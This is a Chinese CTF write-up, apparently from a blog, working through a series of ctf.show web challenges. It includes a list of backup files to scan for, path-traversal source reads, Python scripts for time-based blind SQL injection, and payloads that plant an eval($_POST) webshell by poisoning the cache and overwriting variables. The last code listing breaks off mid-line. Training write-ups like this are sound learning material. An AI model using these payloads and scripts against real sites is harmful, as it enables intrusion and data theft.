摘要:后台扫描开局假页面,扫描后台常用字典整理利用后面的参数读取注入测试读取源代码测试可睡着脚
开局假页面,扫描后台
CTF常用字典整理:
.index.php.swpindex.php.swpindex.php.bak.index.php~index.php.bak_Edietplusindex.php.~index.php.~1~index.phpindex.php~index.php.rarindex.php.zipindex.php.7zindex.php.tar.gzwww.zipwww.rarwww.zipwww.7zwww.tar.gzwww.tarweb.zipweb.rarweb.zipweb.7zweb.tar.gzweb.tarwwwroot.rarweb.rarrobots.txtrobot.txtflag.php
利用后面的action参数读取:
?action=../index
读取源代码:
/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2021-03-08 15:43:51# @Last Modified by: h1xa# @Last Modified time: 2021-03-08 22:30:08# @email: h1xa@ctfer.com# @link: https://ctfer.com*/include("render/render_class.php");include("render/db_class.php");$action=$_GET["action"];if(!isset($action)){ header("location:index.php?action=login"); die(); }if($action=="check"){ $username=$_GET["username"]; $password=$_GET["password"]; $sql = "select id from user where username = md5("$username") and password=md5("$password") order by id limit 1"; $user=db::select_one($sql); if($user){ templateUtil::render("index",array("username"=>$username)); }else{ header("location:index.php?action=login"); }}if($action=="login"){ templateUtil::render($action);}else{ templateUtil::render($action);}
sql测试:
1") or sleep(3)#
可睡着!!
python脚本跑就可以了
import requestsurl = "http://6a6450b5-0579-4051-ae02-0362513e6842.challenge.ctf.show:8080/index.php?action=check&username=yn8rt&password=1") or "result = ""i = 0while True: i = i + 1 head = 32 tail = 126 while head < tail: mid = (head + tail) >> 1 payload = f"if(ascii(substr((select flag from flag),{i},1))>{mid},sleep(2),0)+--+" try: r = requests.get(url + payload, timeout=0.5) tail = mid except Exception as e: head = mid + 1 if head != 32: result += chr(head) else: break print(result)
index.php:
include("render/render_class.php");include("render/db_class.php");$action=$_GET["action"];if(!isset($action)){ header("location:index.php?action=login"); die(); }if($action=="check"){ $sql = "select id from user where username = "".md5($username)."" and password="".md5($password)."" order by id limit 1"; extract($_GET); //将数组中的值转换为变量,并以键名命名 $user=db::select_one($sql);//用处不大,不需要追踪 if($user){ templateUtil::render("index",array("username"=>$username));//追踪 }else{ templateUtil::render("error"); }}if($action=="clear"){ system("rm -rf cache/*"); die("cache clear");}if($action=="login"){ templateUtil::render($action);}else{ templateUtil::render($action);}
脚本跑不了!
action=…/render/render_class:
include("file_class.php");include("cache_class.php");class templateUtil { public static function render($template,$arg=array()){ if(cache::cache_exists($template)){//检查文件是否存在 echo cache::get_cache($template);//利用file_get_contents读取文件 }else{ $templateContent=fileUtil::read("templates/".$template.".php"); $cache=templateUtil::shade($templateContent,$arg); cache::create_cache($template,$cache); echo $cache; } } public static function shade($templateContent,$arg){//给你传入的文件命名 foreach ($arg as $key => $value) { $templateContent=str_replace("{{".$key."}}", $value, $templateContent); } return $templateContent; }}
?action=…/render/cache_class:
class cache{ public static function create_cache($template,$content){ if(file_exists("cache/".md5($template).".php")){ return true; }else{ fileUtil::write("cache/".md5($template).".php",$content);//利用点 } } public static function get_cache($template){ return fileUtil::read("cache/".md5($template).".php"); } public static function cache_exists($template){ return file_exists("cache/".md5($template).".php");//检查该文件是否存在 }}
?action=…/render/file_class:
error_reporting(0);class fileUtil{ public static function read($filename){ return file_get_contents($filename); } public static function write($filename,$content,$append =0){ if($append){ file_put_contents($filename, $content,FILE_APPEND); }else{ file_put_contents($filename, $content); } }}
$filename->md5($template)->md5(error)
echo md5("error");?>//cb5e100e5a9a3e7f6d1fd97512215282.php
$content->$cache->$templateContent->$value->$username=
?action=check&username=&password=1
然后访问:/cache/cb5e100e5a9a3e7f6d1fd97512215282.php
?action=…/index:
include("render/render_class.php");include("render/db_class.php");$action=$_GET["action"];if(!isset($action)){ header("location:index.php?action=login"); die(); }if($action=="check"){ $sql = "select id from user where username = "".md5($username)."" and password="".md5($password)."" order by id limit 1"; extract($_GET); $user=db::select_one($sql); if($user){ templateUtil::render("index",array("username"=>$username)); }else{ templateUtil::render("error");//第二个参数已经没了,利用点失效? }}if($action=="clear"){ system("rm -rf cache/*"); die("cache clear");}if($action=="login"){ templateUtil::render($action);}else{ templateUtil::render($action);}
render/db_class:
class db{ public static function getConnection(){ $username="root"; $password="root"; $port="3306"; $addr="127.0.0.1"; $database="ctfshow"; return new mysqli($addr,$username,$password,$database); } public static function select_one($sql){ $conn = db::getConnection(); $result=$conn->query($sql); if($result){ return $result->fetch_object(); } }}
脚本(利用变量替换):
import requestsurl="http://e01d42ab-f4d9-4c1a-a320-9c516b190af0.challenge.ctf.show:8080/index.php?action=check&sql=select "s="abcdef0123456789-}"flag=""for i in range(9,45):# 已经去了ctfshow{ # print(i) for j in s: u=url+"if(substr((select load_file("/flag")),{0},1)="{1}",sleep(3),1)".format(i,j) try: requests.get(u,timeout=(2.5,2.)) except: flag+=j print(flag) break
?action=…/index:
include("render/render_class.php");include("render/db_class.php");$action=$_GET["action"];if(!isset($action)){ header("location:index.php?action=login"); die(); }if($action=="check"){ extract($_GET); $sql = "select username from user where username = "".$username."" and password="".md5($password)."" order by id limit 1"; $user=db::select_one($sql); if($user){ templateUtil::render("index",array("username"=>$user->username)); }else{ templateUtil::render("error"); }}if($action=="clear"){ system("rm -rf cache/*"); die("cache clear");}if($action=="login"){ templateUtil::render($action);}else{ templateUtil::render($action);}
此时的$username已经没有了md5函数处理:
?action=check&username=-1" union select 0x6576616c28245f504f53545b315d293b20 %230x6576616c28245f504f53545b315d293b20即 eval($_POST[1]); index");?>//cache/6a992d5529f459a44fee58c733255e86.php
我这里第一次失败了,所以需要?action=clear
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0AZvEWHD-1632744146225)(http://images2.5666888.xyz//image-20210918171201592.png)]
?action=…/index:
include("render/render_class.php");include("render/db_class.php");$action=$_GET["action"];if(!isset($action)){ header("location:index.php?action=login"); die(); }if($action=="check"){ extract($_GET); if(preg_match("/^[A-Za-z0-9]+$/", $username)){ $sql = "select username from user where username = "".$username."" and password="".md5($password)."" order by id limit 1"; $user=db::select_one_array($sql); } if($user){ templateUtil::render("index",$user); }else{ templateUtil::render("error"); }}if($action=="clear"){ system("rm -rf cache/*"); die("cache clear");}if($action=="login"){ templateUtil::render($action);}else{ templateUtil::render($action);}
$username
虽然没有经过md5处理但是也匹配掉了非法字符,因为extract($_GET);
在前,所以我们可以对user变量进行变量覆盖,这样就可以在index.php中写一句话木马
满足条件:
payload:
?action=check&username[]=1&password=123&user[username]=
然后访问:
/cache/6a992d5529f459a44fee58c733255e86.php
?action=…/index:
session_start();include("render/render_class.php");include("render/db_class.php");$action=$_GET["action"];if(!isset($action)){ if(isset($_COOKIE["user"])){ $c=$_COOKIE["user"]; $user=unserialize($c);//此处存在反序列化的点 if($user){ templateUtil::render("index"
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/121462.html
摘要:摆烂了摆烂了太难了聪明的师傅已经组队打起月赛了试试能不能苟住前苟住了复现的后面再补充吧文章目录中文识别带师简单的验证码英语阅读这是哪里卡鲁铁盒人家想玩嘛人有点多小城美食安装热身听歌识曲看图识妹进群得码麻麻的只会一题 ...
摘要:从开始学系列爆破从开始学系列爆破爆破什么的,都是基操解码发现是加密的,解码后添加好再设置有效载荷自定义迭代器输入字典自定义迭代器可以自定义拼接方式,的位置即为我们的拼接方式,根据上述 ...
摘要:网络迷踪模块山外有山,题目中给出了一座山,使用百度搜图即可拿到山的名字将图片下载到本地,是一座山头拿去百度搜图看看有什么线索提示图片可能是珠穆朗玛峰大本营提交珠穆朗玛峰 ctf.show 网络迷踪模块-山外有山,题目中给出了一座山,使用百度搜图即可拿到山的名字 将图片下载到本...
摘要:网络迷踪模块第关给了一张飞机尾巴的图片需要获取到飞机的目的地推荐使用百度搜图这一关确认目标比较麻烦要有耐心一个一个找首先下载图片到本地一个飞机尾巴先用百度搜图看有没有我们需要的信息搜出来很多相似图片一个一个的点击去看有没有我们需要的信息漫 ctf.show 网络迷踪模块第2关, 给了一张...
摘要:非反序列化简单审计这个题是搞笑的么按着源码顺序走一遍接受两个参数生成对象调用函数函数伪造请求需要伪造头这题和反序列化没关系。。。如果存在该方法将在任何序列化之前优先执行。 ...
阅读 1027·2023-04-25 18:57
阅读 1644·2023-04-25 16:28
阅读 3770·2021-11-24 09:39
阅读 3378·2021-11-16 11:45
阅读 1597·2021-10-13 09:40
阅读 2793·2021-09-29 09:32
阅读 1148·2019-08-30 15:52
阅读 1612·2019-08-30 10:57